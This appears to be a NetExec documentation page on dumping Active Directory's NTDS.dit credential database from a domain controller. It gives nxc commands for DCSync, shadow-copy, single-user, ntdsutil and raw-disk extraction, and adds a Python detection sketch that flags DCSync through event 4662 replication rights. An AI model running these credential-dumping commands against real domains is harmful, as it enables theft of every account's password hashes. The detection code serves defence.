Dump NTDS.dit

Dump the NTDS.dit from the target DC using methods from secretsdump.py.

2 methods are available:
(default) drsuapi - Uses the drsuapi RPC interface to create a handle and trigger replication, combined with additional drsuapi calls to convert the resultant linked lists into a readable format
vss - Uses the Volume Shadow Copy Service

Dump all users from the NTDS.dit

nxc smb 192.168.1.100 -u UserName -p 'PASSWORDHERE' --ntds
nxc smb 192.168.1.100 -u UserName -p 'PASSWORDHERE' --ntds --enabled
nxc smb 192.168.1.100 -u UserName -p 'PASSWORDHERE' --ntds vss

You can also DCSync with the computer account of the DC.
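
For defenders, the drsuapi method shows up on the DC as Security event 4662 carrying the replication control-access right GUIDs. The following detection sketch is an added example, not part of the original page or the tool: it joins 4662 to the 4624 logon session so that replication requested with a DC computer account from a non-DC host is still flagged. The sample events, the `DC_IPS` inventory and the function name are constructed assumptions, and it covers only the drsuapi method, not vss, ntdsutil or raw disk access.

```python
import re

# Control-access rights a client must exercise to replicate secrets over DRSUAPI.
REPL_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
GUID_RE = re.compile(r"\{([0-9a-fA-F-]{36})\}")

def find_suspect_replication(events, dc_ips):
    """Flag 4662 replication requests whose logon session did not start on a known DC."""
    # 4624 gives the source address for each logon session id.
    logon_src = {e["TargetLogonId"].lower(): e["IpAddress"]
                 for e in events if e["EventID"] == 4624}
    hits = []
    for e in events:
        if e["EventID"] != 4662:
            continue
        guids = {g.lower() for g in GUID_RE.findall(e["Properties"])}
        rights = sorted(REPL_RIGHTS[g] for g in guids if g in REPL_RIGHTS)
        if not rights:
            continue  # object access unrelated to replication
        # A session with no matching 4624 is reported as "unknown" rather than trusted.
        src = logon_src.get(e["SubjectLogonId"].lower(), "unknown")
        if src not in dc_ips:
            hits.append({"account": e["SubjectUserName"], "source": src, "rights": rights})
    return hits

# Constructed sample events (field names follow Windows Security events 4624 and 4662).
GC = "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}"
GCA = "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"
SAMPLE_EVENTS = [
    {"EventID": 4624, "TargetUserName": "DC02$", "TargetLogonId": "0x1A2B", "IpAddress": "10.0.0.11"},
    {"EventID": 4662, "SubjectUserName": "DC02$", "SubjectLogonId": "0x1a2b", "Properties": GC + GCA},
    {"EventID": 4624, "TargetUserName": "DC01$", "TargetLogonId": "0x3c4d", "IpAddress": "10.0.0.50"},
    {"EventID": 4662, "SubjectUserName": "DC01$", "SubjectLogonId": "0x3c4d", "Properties": GC + GCA},
    {"EventID": 4624, "TargetUserName": "UserName", "TargetLogonId": "0x5e6f", "IpAddress": "10.0.0.50"},
    {"EventID": 4662, "SubjectUserName": "UserName", "SubjectLogonId": "0x5e6f", "Properties": GC},
    {"EventID": 4662, "SubjectUserName": "helpdesk", "SubjectLogonId": "0x7a8b",
     "Properties": "{bf967aba-0de6-11d0-a285-00aa003049e2}"},
]
DC_IPS = {"10.0.0.10", "10.0.0.11"}  # assumed inventory of domain controller addresses

if __name__ == "__main__":
    for hit in find_suspect_replication(SAMPLE_EVENTS, DC_IPS):
        print(hit)
```

Event 4662 is only written when Directory Service Access auditing is enabled on the domain controllers, so confirm that policy before relying on this check.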

Dump a specific user only

nxc smb 192.168.1.100 -u UserName -p 'PASSWORDHERE' --ntds --user Administrator

Dump NTDS using ntdsutil

There is also the ntdsutil module, which uses ntdsutil to dump NTDS.dit and the SYSTEM hive and parses them locally with secretsdump.py.

Dump NTDS using raw disk access

The ntds-dump-raw module uses raw disk access to extract NTDS.dit and the SYSTEM hive by reading directly from the physical drive, then parses them locally with secretsdump.py.
